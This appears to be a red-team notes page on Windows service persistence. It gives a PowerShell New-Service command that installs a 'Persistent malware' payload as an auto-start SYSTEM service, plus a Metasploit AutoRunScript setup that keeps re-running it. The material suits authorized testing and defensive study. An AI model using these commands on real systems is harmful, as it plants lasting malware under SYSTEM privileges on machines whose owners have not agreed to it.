This require an elevated shell
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry.
Services may be created with administrator privileges but are executed under SYSTEM privileges
Setup
Services can be created from the command prompt if the account has local administrator privileges. The parameter “binpath” is used for the execution of the arbitrary payload and the “auto” to ensure that the rogue service will initiate automatically.
Via powershell
New-Service -Name "joker" -BinaryPathName "C:\Users\talion\AppData\Roaming\jkr.exe" -Description "Persistent malware" -StartupType Automatic
Start-Service jokerNote that sometime the shell die pretty quickly, you can still use the option AutoRunScript from multi/handler
see https://subscription.packtpub.com/book/networking-and-servers/9781786463166/9/ch09lvl1sec62/using-autorunscript-in-metasploit
Remember to Reactivate the option
ExitOnSessionif you use this technique, otherwise you will create new sessions indefinitely
$> cat autorun.rc
execute -Htzf "C:\Users\talion\AppData\Roaming\jkr.exe"
$> fg
msf> set AutoRunScript autorun.rc
Sources: